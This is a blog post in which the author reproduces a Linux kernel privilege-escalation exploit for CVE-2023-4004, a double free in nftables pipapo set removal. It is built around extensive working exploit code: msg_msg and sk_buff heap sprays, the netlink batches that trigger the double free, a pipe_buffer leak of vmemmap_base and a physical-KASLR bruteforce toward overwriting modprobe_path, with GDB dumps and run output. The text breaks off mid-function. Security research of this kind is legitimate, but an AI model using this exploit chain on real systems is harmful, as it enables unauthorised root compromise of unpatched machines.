Linux kernel exploitation: CVE-2023-4004

Posted Jan 31, 2025 Updated Aug 5, 2025

By Bam

Introduction

It all started in early 2024 when I decided to focus on vulnerability research and exploit development for the Linux kernel in my free time after work. Every night, I would open my laptop and study this topic, and this routine continued for an entire year.

Right before the end of the year, I decided to challenge myself by reproducing exploits for specific CVEs to test how much I had learned and understood in this field. To be honest, I am still a complete beginner from every perspective, especially since my background is neither in IT nor academia. However, I wanted to break through these limitations.

At that point, I visited the KernelCTF repository to try reproducing CVEs that had already been reported by researchers. As my targets I chose two CVEs that, according to the researchers, were “easy” to trigger: CVE-2023-4004 and CVE-2023-4244.

Why did I choose these two CVEs? First, I had previously studied nftables and CVEs related to nftables itself. Second, there are several CVEs with similar vulnerabilities, so I only needed to learn how to trigger the bug and escalate privileges to achieve root access.

What is nftables?

I won’t go into too much detail about nftables since I want to keep this post concise. But don’t worry—I will provide blog or reference posts that discuss nftables in detail at the end of this post.

nftables is a Netfilter project aimed at replacing the existing {ip,ip6,arp,eb}tables framework. It provides a new packet filtering framework, a new userspace utility (nft), and a compatibility layer for {ip,ip6}tables. It reuses the existing Netfilter hooks, connection tracking system, userspace queuing component, and logging subsystem.

It consists of three main components:

Kernel implementation – provides the netlink configuration interface and runtime rule set evaluation.
Netlink communication via libnl – contains the fundamental functions for communicating with the kernel.
Userspace front-end (nft) – facilitates user interaction with nftables.

nftables implements packet data filtering using several key components such as table, set, chain, and rule.

Cause analysis

The researcher who discovered this bug found a vulnerability in the nft_pipapo_remove function located in /net/netfilter/nft_set_pipapo.c.

When a pipapo set attempts to remove an element, it first locates the element using NFT_SET_EXT_KEY and NFT_SET_EXT_KEY_END:

  
static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
			      const struct nft_set_elem *elem)
{
	...
		match_start = data;
		match_end = (const u8 *)nft_set_ext_key_end(&e->ext)->data;

		start = first_rule;
		rules_fx = rules_f0;

		nft_pipapo_for_each_field(f, i, m) {
			if (!pipapo_match_field(f, start, rules_fx,
						match_start, match_end))
				break;
    ...

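However, nft_pipapo_remove never checks whether the element actually has an NFT_SET_EXT_KEY_END extension. For an element inserted without an end key, match_end is derived from an extension that does not exist, so the rule lookup can fail and the element stays in the set even though it is later freed. Because it is still in the set, we can delete it, and therefore free it, repeatedly.

A proper check should have been implemented, similar to the one in nft_pipapo_insert: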

  
static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,
			     const struct nft_set_elem *elem,
			     struct nft_set_ext **ext2)
{
    ...
	if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END))
		end = (const u8 *)nft_set_ext_key_end(ext)->data;
	else
		end = start;
    ...
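
The fallback that insertion applies can be sketched outside the kernel. The following is a toy model only: `toy_elem` and `toy_match_end` are hypothetical names invented for illustration, and the structure is not the kernel's extension layout. It shows the idea that the end of the range should default to the start key whenever no end key was supplied, which is the check removal lacks.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy stand-in for a set element's keys (NOT the kernel layout). */
struct toy_elem {
    const uint8_t *key;      /* start key, always present */
    const uint8_t *key_end;  /* NULL when the element has no end key */
};

/*
 * Pick the end of the range the way nft_pipapo_insert does:
 * fall back to the start key when no end key was supplied.
 */
static const uint8_t *toy_match_end(const struct toy_elem *e)
{
    return e->key_end ? e->key_end : e->key;
}
```

With this fallback, an element that has only a start key is matched as the single-value range [key, key] on both insertion and removal, so both paths agree on what the element looks like.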

Triggering the vulnerability

Before we proceed to trigger the vulnerability, there are several things to consider regarding commit, batch, and transaction in nftables. Understanding these three aspects helps us in exploiting the vulnerability—should the bug be triggered after a commit? Or is the double free caused by an abort?

Concretely, I create the set and insert two elements in one batch (one transaction), and then trigger the vulnerability in the transactions that follow.

To trigger the vulnerability, the original author performed:

Create a pipapo set.
Insert an element into the set without NFT_SET_EXT_KEY_END.
Flush the set without NFT_SET_EXT_KEY_END. (At this point, the element is freed but not removed from the set.)
Flush the set without NFT_SET_EXT_KEY_END again. (At this point, the element is freed a second time.)

Meanwhile, I triggered it in a way similar to CVE-2024-26809 because it was easier:

Create a pipapo set.
Insert element A and element B simultaneously into the set without NFT_SET_EXT_KEY_END.
Delete element A (element B also gets deleted).
Delete element A again (element B also gets deleted again).

This is a powerful double-free primitive because it is not detected by CONFIG_SLAB_FREELIST_HARDENED.

Normally, when we double free an object, we need to allocate another object of the same size before the second free to bypass this mitigation.

In this case, the bypass probably works because both elements were allocated together in the set and are freed alternately (A, B, A, B). As far as I can tell, the hardening check only catches an object that is freed twice back to back, and here the other element is always freed in between.
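
One possible explanation can be illustrated with a toy freelist. This is a sketch under a stated assumption: that the double-free detection amounts to comparing the object being freed with the current head of the freelist. `toy_cache`, `toy_obj` and `toy_free` are hypothetical names, not kernel symbols, and the real allocator is far more involved.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy LIFO freelist: each free object stores a pointer to the next one. */
struct toy_obj {
    struct toy_obj *next_free;
};

struct toy_cache {
    struct toy_obj *head;   /* most recently freed object */
};

/*
 * Free with a naive check: refuse only if obj is already the list head.
 * Returns false when the double free is detected.
 */
static bool toy_free(struct toy_cache *c, struct toy_obj *obj)
{
    if (obj == c->head)
        return false;       /* back-to-back double free is caught */
    obj->next_free = c->head;
    c->head = obj;
    return true;
}
```

In this model, freeing A twice in a row is rejected, while the order A, B, A, B goes through unnoticed because the object being freed is never the current head. That matches the order in which the two elements are freed here.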

I’m still a bit confused about this behavior, and I hope that a veteran researcher will read my post, review my exploit code, and validate or correct my exploit strategy and analysis.

I would be thrilled if that happens! 😊.

Exploit it

The goal of my exploit is to achieve a double free in kmalloc-cg-1k to leak pipe_buffer->page, which allows us to obtain the vmemmap base address. After that, we can perform physical read and write operations.

Using this primitive, we can overwrite the string in modprobe_path to point it to a memory file created using memfd_create, located under /proc/<pid>/fd/<n>.

Preparation before triggering the vulnerability

Before triggering the bug, we spray msg_msg objects in kmalloc-cg-256, ensuring that each secondary message is placed in kmalloc-cg-1k.

By incrementing the next pointer of msg_msg objects that we control by 256, we can make it point to a secondary message that is already referenced by a different primary message, creating a duplicate reference.

This technique allows us to easily pivot our double-free primitive to a different cache, enabling us to target more objects in the system.

  
...
// Spray msg_msg in kmalloc-256 and kmalloc-1k
    msg_t *msg = calloc(1, sizeof(msg_t) + 0xe8 - 48);
    int qid[SPRAY];
    for (int i = 0; i < SPRAY; i++)
    {
        qid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
        if (qid[i] < 0)
        {
            perror("[-] msgget");
        }
        *(uint32_t *)msg->mtext = i;
        *(uint64_t *)&msg->mtext[8] = 0xdeadbeefcafebabe;
        msg->mtype = MTYPE_PRIMARY;
        msgsnd(qid[i], msg, 0xe8 - 48, 0);
        msg->mtype = MTYPE_SECONDARY;
        msgsnd(qid[i], msg, 1024 - 48, 0);
    }
    // Prepare evil msg
    int evilqid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    if (evilqid < 0)
    {
        perror("[-] msgget");
    }
...
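
The payload sizes passed to msgsnd above are chosen so that header plus payload fills a specific size class. A minimal sketch of that arithmetic, assuming the 48-byte msg_msg header on x86-64 and the usual general-purpose kmalloc size classes (`kmalloc_class` and `msg_class` are hypothetical helper names, and only payloads that fit in a single message segment are considered):

```c
#include <assert.h>
#include <stddef.h>

#define MSG_MSG_HDR 48  /* sizeof(struct msg_msg) on x86-64 */

/*
 * Smallest general-purpose kmalloc size class that fits `size` bytes.
 * Covers the usual classes up to 8k, including the odd 96 and 192.
 */
static size_t kmalloc_class(size_t size)
{
    static const size_t classes[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };
    for (size_t i = 0; i < sizeof(classes) / sizeof(classes[0]); i++)
        if (size <= classes[i])
            return classes[i];
    return 0; /* larger requests are not served from these caches */
}

/* Size class used by a message whose mtext is `payload` bytes long. */
static size_t msg_class(size_t payload)
{
    return kmalloc_class(MSG_MSG_HDR + payload);
}
```

For example, `msg_class(0xe8 - 48)` gives 256 and `msg_class(1024 - 48)` gives 1024, matching the primary and secondary messages. The `1024 - 320` writes to the socket pairs later in the exploit presumably follow the same logic, leaving room for the 320-byte skb_shared_info that shares the allocation with the data.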

Next, we prepare an sk_buff, which we will later use to allocate a fake msg_msg. This allows us to leak pipe_buffer->page by reading sk_buff->data.

  
...
// Setup skbuf
    int sock[SKBUF_SPRAY][2];
    for (int i = 0; i < SKBUF_SPRAY; i++)
    {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, sock[i]) < 0)
        {
            perror("[-] socketpair");
            return -1;
        }
    }
...

And now, we arrive at the vulnerability trigger section:

  
    ...
        // TRANSACTION 2
    batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit);
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    // create pipapo set
    uint8_t desc[2] = {16, 16};
    set = create_set(
        batch, seq++, exploit_table_name, "pwn_set", 0x1337,
        NFT_SET_INTERVAL | NFT_SET_OBJECT | NFT_SET_CONCAT, KEY_LEN, 2, &desc, NULL, 0, NFT_OBJECT_CT_EXPECT);

    // commit 2 elems to set


    for (int i = 0; i < 2; i++)
    {
        elem[i] = nftnl_set_elem_alloc();
        memset(key, 0x41 + i, KEY_LEN);
        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_OBJREF, "pwnobj", 7);
        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_KEY, &key, KEY_LEN);
        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_USERDATA, &udata_buf, udata_size);
        nftnl_set_elem_add(set, elem[i]);
    }

    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
                                NFT_MSG_NEWSETELEM, family,
                                NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK,
                                seq++);
    nftnl_set_elems_nlmsg_build_payload(nlh, set);
    mnl_nlmsg_batch_next(batch);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0)
    {
        perror("[-] mnl_socket_sendto");
    }
    mnl_nlmsg_batch_stop(batch);

    // TRANSACTION 3
    batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit);
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    set = nftnl_set_alloc();
    nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family);
    nftnl_set_set_str(set, NFTNL_SET_TABLE, exploit_table_name);
    nftnl_set_set_str(set, NFTNL_SET_NAME, "pwn_set");


    // first free of the committed elems
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
                                NFT_MSG_DELSETELEM, family,
                                NLM_F_ACK,
                                seq++);
    nftnl_set_nlmsg_build_payload(nlh, set);
    nftnl_set_free(set);
    mnl_nlmsg_batch_next(batch);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0)
    {
        perror("[-] mnl_socket_sendto");
    }
    mnl_nlmsg_batch_stop(batch);

    batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit);
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    set = nftnl_set_alloc();
    nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family);
    nftnl_set_set_str(set, NFTNL_SET_TABLE, exploit_table_name);
    nftnl_set_set_str(set, NFTNL_SET_NAME, "pwn_set");


    // second free of the committed elems (double free)
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
                                NFT_MSG_DELSETELEM, family,
                                NLM_F_ACK,
                                seq++);
    nftnl_set_nlmsg_build_payload(nlh, set);
    nftnl_set_free(set);
    mnl_nlmsg_batch_next(batch);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0)
    {
        perror("[-] mnl_socket_sendto");
    }
    mnl_nlmsg_batch_stop(batch);     
    ...

CVE-2023-4004 is very easy to exploit because we can free its elements multiple times. The element size is also not fixed, so we can choose which slab cache the freed chunk lands in, which opens up many ways to exploit it.

  
void *nft_set_elem_init(const struct nft_set *set,
			const struct nft_set_ext_tmpl *tmpl,
			const u32 *key, const u32 *key_end,
			const u32 *data, u64 timeout, u64 expiration, gfp_t gfp)
{
	struct nft_set_ext *ext;
	void *elem;

	elem = kzalloc(set->ops->elemsize + tmpl->len, gfp);
	if (elem == NULL)
		return NULL;
    ...

tmpl->len is related to user input, such as NFTA_SET_ELEM_USERDATA, which means we can control the element size. So we just need to find a structure to leak information. Look at this:

  
static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
			    const struct nlattr *attr, u32 nlmsg_flags)
{
        ...
        if (ulen > 0) {
                if (nft_set_ext_check(&tmpl, NFT_SET_EXT_USERDATA, ulen) < 0) {
                    err = -EINVAL;
                    goto err_elem_userdata;
                }
                udata = nft_set_ext_userdata(ext);
                udata->len = ulen - 1;
                nla_memcpy(&udata->data, nla[NFTA_SET_ELEM_USERDATA], ulen); // element data length
        ...

After triggering the double free, we reclaim the freed element chunk with nft_table->udata. The element is created with a user data length (ulen) of 0x88+3, so that its chunk can be reclaimed by a table->udata buffer of a similar size. This allows us to obtain a duplicate table->udata.

  
struct nft_table {
	struct list_head		list;
	struct rhltable			chains_ht;
	struct list_head		chains;
	struct list_head		sets;
	struct list_head		objects;
	struct list_head		flowtables;
	u64				hgenerator;
	u64				handle;
	u32				use;
	u16				family:6,
					flags:8,
					genmask:2;
	u32				nlpid;
	char				*name;
	u16				udlen;
	u8				*udata; //-> user data
};

Now, we spray three nft_table->udata buffers and check whether two of them ended up as duplicates.

  
...
void udata_spray(struct mnl_socket *nl, uint32_t size, uint32_t start, uint32_t count, void *data)
{
    char spray_name[16];
    char udata_buf[size];
    char *dptr = udata_buf;
    uint32_t seq = rand() % (UINT32_MAX / 2);
    struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit);
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    if (data)
    {
        dptr = data;
    }

    for (int i = start; i < start + count; i++)
    {
        if (!data)
        {
            memset(udata_buf, 0x30 + i, size);
        }
        snprintf(spray_name, sizeof(spray_name), "spray-%i", i);
        nftnl_table_free(create_table(batch, seq++, spray_name, dptr, size));
    }

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0)
    {
        perror("[-] mnl_socket_sendto");
    }
    mnl_nlmsg_batch_stop(batch);
}
...
    udata_spray(nl, 0xe8, 0, 3, NULL);

    char spray_name[16];
    char *udata[3];
    for (int i = 0; i < 3; i++)
    {
        snprintf(spray_name, sizeof(spray_name), "spray-%i", i);
        udata[i] = getudata(nl, spray_name);
    }
    // spray-0 and spray-2 return the same bytes when they share one chunk
    if (udata[0][0] == udata[2][0])
    {
        printf("[+] table spray-0->udata 0x%lx\n", *(uint64_t *)&udata[0][0]);
        printf("[+] table spray-2->udata 0x%lx\n", *(uint64_t *)&udata[2][0]);

        puts("[+] got duplicated table");
    }
    else
    {
        puts("[-] exploit failed");
        return -1;
    }
...

To better understand how we obtain the overlapping nft_table->udata, we can inspect it directly using GDB. However, I prefer to analyze it in more detail from the beginning, such as examining the msg_msg objects that we initially sprayed in GDB.

  
pwndbg> x/20gx msg

0xffff88810025a800:	0x0000000000000000	0x0000000000000000 -> msg->m_list 
0xffff88810025a810:	0x0000000000000041	0x00000000000000b8 -> 0x41 msg->mtype(MTYPE_PRIMARY) and 0xb8 = 0xe8 - 0x30... (232 - 48)
0xffff88810025a820:	0x0000000000000000	0x0000000000000000
0xffff88810025a830:	0x0000000000000000	0xdeadbeefcafebabe -> msg->mtext[8] in our exploit

pwndbg> x/40gx msg

0xffff8881041d1c00:	0xffff888102afd100	0xffff888102afd100 -> msg->m_list 
0xffff8881041d1c10:	0x0000000000000042	0x00000000000003d0 -> 0x42 msg->mtype(MTYPE_SECONDARY) and 0x3d0 = 0x400 - 0x30... (1024 - 48)
0xffff8881041d1c20:	0x0000000000000000	0x0000000000000000
0xffff8881041d1c30:	0x0000000000000000	0xdeadbeefcafebabe
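
To read these dumps more easily, it helps to map the offsets onto the message header. The following is a userspace mirror of the 48-byte msg_msg header on x86-64, written for illustration only: `msg_msg_mirror` and `read_marker` are hypothetical names, and pointers are stored as plain 64-bit integers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Userspace mirror of the msg_msg header (illustration, not kernel code). */
struct msg_msg_mirror {
    uint64_t m_list_next;   /* 0x00 */
    uint64_t m_list_prev;   /* 0x08 */
    uint64_t m_type;        /* 0x10: 0x41 or 0x42 in the dumps */
    uint64_t m_ts;          /* 0x18: payload length, 0xb8 or 0x3d0 */
    uint64_t next;          /* 0x20: next segment, NULL here */
    uint64_t security;      /* 0x28 */
    uint8_t  mtext[];       /* 0x30: payload starts here */
};

_Static_assert(sizeof(struct msg_msg_mirror) == 48, "header is 48 bytes");
_Static_assert(offsetof(struct msg_msg_mirror, m_ts) == 0x18, "m_ts offset");
_Static_assert(offsetof(struct msg_msg_mirror, mtext) == 0x30, "mtext offset");

/* Read the 8-byte marker the exploit stores at mtext[8] (chunk + 0x38). */
static uint64_t read_marker(const void *chunk)
{
    uint64_t v;
    memcpy(&v, (const uint8_t *)chunk +
               offsetof(struct msg_msg_mirror, mtext) + 8, sizeof(v));
    return v;
}
```

Applied to the first dump, the value at offset 0x38 is the 0xdeadbeefcafebabe marker, and the word at 0x18 is the payload length 0xb8.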

This is not essential, but I always prefer to see everything as clearly and in as much detail as possible. Now, let’s look at the vulnerable function and at how the bug leads to a double free of the element and, in turn, to a duplicated nft_table->udata:

To ensure consistency, our user data elements are assigned the value 0x41, with keys 0x41 (Element A) and 0x42 (Element B). As a result, the two nft_table instances will receive two udata values with the same data due to the double free on the element.

Additionally, in the udata_spray function that we used to spray the three nft_table->udata instances earlier, the values in udata start from 0x30 to 0x32.

  
...
for (int i = start; i < start + count; i++)
    {
        if (!data)
        {
            memset(udata_buf, 0x30 + i, size);
        }
        snprintf(spray_name, sizeof(spray_name), "spray-%i", i);
        nftnl_table_free(create_table(batch, seq++, spray_name, dptr, size));
    }
...

So, now let’s check our gdb again:

  
static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
			      const struct nft_set_elem *elem)
{
	struct nft_pipapo *priv = nft_set_priv(set);
	struct nft_pipapo_match *m = priv->clone;
	struct nft_pipapo_elem *e = elem->priv;
	int rules_f0, first_rule = 0;
	const u8 *data;

	data = (const u8 *)nft_set_ext_key(&e->ext);

->	e = pipapo_get(net, set, data, 0);
	if (IS_ERR(e))
		return;

	while ((rules_f0 = pipapo_rules_same_key(m->f, first_rule))) {
		union nft_pipapo_map_bucket rulemap[NFT_PIPAPO_MAX_FIELDS];
		const u8 *match_start, *match_end;
		struct nft_pipapo_field *f;
		int i, start, rules_fx;
...
pwndbg> x/40gx e 

0xffff888105615600:	0x3800000000000c03	0x4242424200003000
0xffff888105615610:	0x4242424242424242	0x4242424242424242
0xffff888105615620:	0x4242424242424242	0x0000000042424242
0xffff888105615630:	0xffff888105615900	0x414141414141418a
0xffff888105615640:	0x4141414141414141	0x4141414141414141
0xffff888105615650:	0x4141414141414141	0x4141414141414141
0xffff888105615660:	0x4141414141414141	0x4141414141414141
0xffff888105615670:	0x4141414141414141	0x4141414141414141
0xffff888105615680:	0x4141414141414141	0x4141414141414141
0xffff888105615690:	0x4141414141414141	0x4141414141414141
0xffff8881056156a0:	0x4141414141414141	0x4141414141414141
0xffff8881056156b0:	0x4141414141414141	0x4141414141414141
...

We successfully triggered the double free. Since we sprayed several nft_table->udata instances with approximately the same size beforehand, this caused two nft_table->udata instances to have the same value. This happened because one of the nft_table->udata instances occupied the double-free slot that we successfully triggered. Now, let’s inspect the nft_table:

pwndbg> x table

0xffff888102a56e00:	0xffff888105631280
pwndbg> x/s table->name

0xffff8881002563b8:	"spray-2"
pwndbg> x/10gx table->udata
0xffff888105615600:	0x3232323232323232	0x3232323232323232
0xffff888105615610:	0x3232323232323232	0x3232323232323232
0xffff888105615620:	0x3232323232323232	0x3232323232323232
0xffff888105615630:	0x3232323232323232	0x3232323232323232
0xffff888105615640:	0x3232323232323232	0x3232323232323232

The chunk at 0xffff888105615600, which previously held our double-freed element, is now occupied by an nft_table->udata buffer. This is the result:

  
[ Bam0x7 ]
/ $ ./exploit
[*] prepare table and chain
[*] trigger double-free
[+] table spray-0->udata 0x3232323232323232
[+] table spray-2->udata 0x3232323232323232
[+] got duplicated table

Then we replace it with msg_msg. We allocate a msg_msg of size 256 (the primary message) so that it occupies the chunk shared by the duplicated nft_table->udata, and send a 1k secondary message on the same queue. The primary message’s m_list.next then points to the secondary message, so when we read nft_table->udata we get an address in kmalloc-cg-1k.

  
pwndbg> x/40gx msg

0xffff888105615600:	0x3232323232323232	0x3232323232323232 ->msg->m_list 
0xffff888105615610:	0x0000000000000041	0x00000000000000b8 -> msg->mtype 0x41, size = 0xe8 - 0x30 = 0xb8 ... (232 - 48)
0xffff888105615620:	0x0000000000000000	0x0000000000000000
0xffff888105615630:	0x4141414141414141	0xdeadbeefcafebabe -> msg->mtext[8]

result:

pwndbg> x/40gx 0xffff888105615600

0xffff888105615600:	0xffff88810307a400	0xffff8881056157c0
0xffff888105615610:	0x0000000000000041	0x00000000000000b8
0xffff888105615620:	0x0000000000000000	0x0000000000000000
0xffff888105615630:	0x4141414141414141	0xdeadbeefcafebabe

The chunk at 0xffff888105615600 is now occupied by our primary message (kmalloc-cg-256), and its m_list.next points into kmalloc-cg-1k because that is the cache our secondary message lives in. Let’s prove it by reading nft_table->udata again. This is the result:

  
[ Bam0x7 ]
/ $ ./exploit
[*] prepare table and chain
[*] trigger double-free
[+] table spray-0->udata 0x3232323232323232
[+] table spray-2->udata 0x3232323232323232
[+] got duplicated table
[*] replace with msg_msg
[*] kmalloc-1k msg: 0xffff88810307a400

Now we need to find out which queue owns the secondary message, so that we can double free it in kmalloc-cg-1k as planned. To do that, we create a fake message header that is allocated as nft_table->udata and call msgrcv with the MSG_COPY flag, which returns a copy without destroying the original message. The index stored at the start of mtext tells us which secondary message we hit.

  
// Find next msg
    fake_obj[0] -= 1024 * 20;
    deludata_spray(nl, 2, 1);
    wait_destroyer();
    udata_spray(nl, 0xe8, 3, 1, fake_obj);
    wait_destroyer();
    if (msgrcv(evilqid, msg, 1024 - 48, MTYPE_SECONDARY, IPC_NOWAIT | MSG_COPY) < 0)
    {
        perror("[-] msgrcv");
    }

    int victim_idx = *(uint32_t *)msg->mtext;
    printf("[*] victim qid: %i\n", qid[victim_idx]);

This is the result:

  
[ Bam0x7 ]
/ $ ./exploit
[*] prepare table and chain
[*] trigger double-free
[+] table spray-0->udata 0x3232323232323232
[+] table spray-2->udata 0x3232323232323232
[+] got duplicated table
[*] replace with msg_msg
[*] kmalloc-1k msg: 0xffff88810307a400
[*] victim qid: 488

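This is what we expected. Now we can free the victim secondary message, reclaim its chunk with a fake message stored in sk_buff->data, and free it a second time through the evil queue. The pipe_buffer spray then reclaims the same chunk, so reading the socket back leaks pipe_buffer->page.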

  
// Free kmalloc-1k msg
    if (msgrcv(qid[victim_idx], msg, 1024 - 48, MTYPE_SECONDARY, 0) < 0)
    {
        perror("[-] msgrcv");
    }

    // Replace msg with a fake msg using skbuf
    struct msg_msg *fake_msg = calloc(1, sizeof(struct msg_msg) + 1024 - 48);
    fake_msg->m_list.next = msg_ptr - 1024 * 20;
    fake_msg->m_list.prev = msg_ptr - 1024 * 20;
    fake_msg->m_type = MTYPE_FAKE;
    fake_msg->m_ts = 1024 - 48;
    *(uint64_t *)fake_msg->text = 0x1337133713371337;
    puts("[*] send fake msg skbuf");
    for (int i = 0; i < SKBUF_SPRAY; i++)
    {
        if (write(sock[i][0], fake_msg, 1024 - 320) < 0)
        {
            perror("[-] write(socket)");
            return -1;
        }
    }

    // Double free kmalloc-1k msg
    puts("[*] double-free victim msg");
    if (msgrcv(evilqid, msg, 1024 - 48, MTYPE_FAKE, 0) < 0)
    {
        perror("[-] msgrcv");
    }

    // Spray pipe_buffer victims
    int fdflags;
    int pfd[PIPE_SPRAY][2];
    for (int i = 0; i < PIPE_SPRAY; i++)
    {
        pipe(pfd[i]);
        fdflags = fcntl(pfd[i][0], F_GETFL, 0);
        fcntl(pfd[i][0], F_SETFL, fdflags | O_NONBLOCK);
        fdflags = fcntl(pfd[i][1], F_GETFL, 0);
        fcntl(pfd[i][1], F_SETFL, fdflags | O_NONBLOCK);
    }

    // Populate pipe_buffer
    for (int i = 0; i < PIPE_SPRAY; i++)
    {
        write(pfd[i][1], "pwn", 3);
    }

    // Leak pipe_buffer
    char leak[1024];
    struct pipe_buffer *pipebuf = calloc(1, 1024);
    puts("[*] read pipe_buffer with skbuf");
    for (int i = 0; i < SKBUF_SPRAY; i++)
    {
        if (read(sock[i][1], leak, 1024 - 320) < 0)
        {
            perror("[-] read(socket)");
            return -1;
        }
        if (*(uint64_t *)&leak[48] != 0x1337133713371337)
        {
            memcpy(pipebuf, leak, 1024);
            puts("[+] found pipe_buffer");
        }
    }

    uint64_t vmemmap_base = pipebuf->page & MASK;
    printf("[*] vmemmap_base: 0x%lx\n", vmemmap_base);

This is the result:

  
[ Bam0x7 ]
/ $ ./exploit
[*] prepare table and chain
[*] trigger double-free
[+] table spray-0->udata 0x3232323232323232
[+] table spray-2->udata 0x3232323232323232
[+] got duplicated table
[*] replace with msg_msg
[*] kmalloc-1k msg: 0xffff88810307a400
[*] victim qid: 488
[*] send fake msg skbuf
[*] double-free victim msg
[*] read pipe_buffer with skbuf
[+] found pipe_buffer
[*] vmemmap_base: 0xffffea0000000000
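
To see why a pipe's buffer array can reclaim a kmalloc-cg-1k chunk, it helps to look at its size. The sketch below mirrors struct pipe_buffer on x86-64 in userspace and assumes the default of 16 buffers per pipe. `pipe_buffer_mirror` and `pipe_ring_bytes` are hypothetical names used only for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Userspace mirror of struct pipe_buffer (pointers as integers). */
struct pipe_buffer_mirror {
    uint64_t page;      /* struct page *, an address inside vmemmap */
    uint32_t offset;    /* offset of the data inside the page */
    uint32_t len;       /* number of bytes stored in the page */
    uint64_t ops;       /* pointer to the buffer operations table */
    uint32_t flags;
    uint64_t private_;  /* padded to 8-byte alignment after flags */
};

/* Bytes needed for a ring of `nbufs` pipe buffers. */
static size_t pipe_ring_bytes(size_t nbufs)
{
    return nbufs * sizeof(struct pipe_buffer_mirror);
}
```

Each entry is 40 bytes, so a ring of 16 entries needs 640 bytes, which is too large for a 512-byte chunk and therefore served from the 1k size class. The first field of the first entry is the page pointer, which is why the start of the leaked chunk gives us an address inside vmemmap.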

Bruteforce physical kernel base

With the ability to point pipe_buffer->page at any page and read or write it, we can search kernel memory for any value we want to overwrite, such as modprobe_path. Keep in mind that searching page by page from the beginning of vmemmap_base can be very time consuming, because the kernel is loaded at a randomized physical address. However, the kernel base is always aligned to the constant PHYSICAL_ALIGN, which defaults to 0x200000 on amd64. So we can speed up the search by first probing only aligned addresses until one looks like the kernel base, and then scanning page by page from there.

  
...
// Bruteforce phys-KASLR
    uint64_t kernel_base;
    bool found = false;
    uint8_t data[PAGE_SIZE] = {0};
    puts("[*] bruteforce phys-KASLR");
    for (uint64_t i = 0;; i++)
    {
        kernel_base = 0x40 * ((PHYSICAL_ALIGN * i) >> PAGE_SHIFT);
        pipebuf->page = vmemmap_base + kernel_base;
        pipebuf->offset = 0;
        pipebuf->len = PAGE_SIZE + 1;

        printf("\r[*] trying 0x%lx", pipebuf->page);

        for (int i = 0; i < SKBUF_SPRAY; i++)
        {
            if (write(sock[i][0], pipebuf, 1024 - 320) < 0)
            {
                perror("\n[-] write(socket)");
                return -1;
            }
        }

        for (int j = 0; j < PIPE_SPRAY; j++)
        {
            memset(&data, 0, PAGE_SIZE);
            int count;
            if ((count = read(pfd[j][0], &data, PAGE_SIZE)) < 0)
            {
                continue;
            }

            if (!memcmp(&data, "pwn", 3))
            {
                continue;
            }

            if (is_kernel_base(data))
            {
                found = true;
                break;
            }
        }

        for (int i = 0; i < SKBUF_SPRAY; i++)
        {
            if (read(sock[i][1], leak, 1024 - 320) < 0)
            {
                perror("[-] read(socket)");
                return -1;
            }
        }

        if (found)
        {
            break;
        }
    }
    found = false;
    printf("\n[+] kernel base vmemmap offset: 0x%lx\n", kernel_base);
...
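
The page arithmetic in the loop above can be checked in isolation. This is a minimal sketch that assumes 4 KiB pages and a 0x40-byte struct page, the same constants the loop uses. `page_for_phys` and `phys_for_page` are hypothetical helper names.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT      12
#define STRUCT_PAGE_SZ  0x40ULL      /* sizeof(struct page), as in the loop */
#define PHYSICAL_ALIGN  0x200000ULL  /* default kernel alignment on amd64 */

/* Address of the struct page that describes physical address `phys`. */
static uint64_t page_for_phys(uint64_t vmemmap_base, uint64_t phys)
{
    return vmemmap_base + (phys >> PAGE_SHIFT) * STRUCT_PAGE_SZ;
}

/* Inverse: physical address of the frame a struct page describes. */
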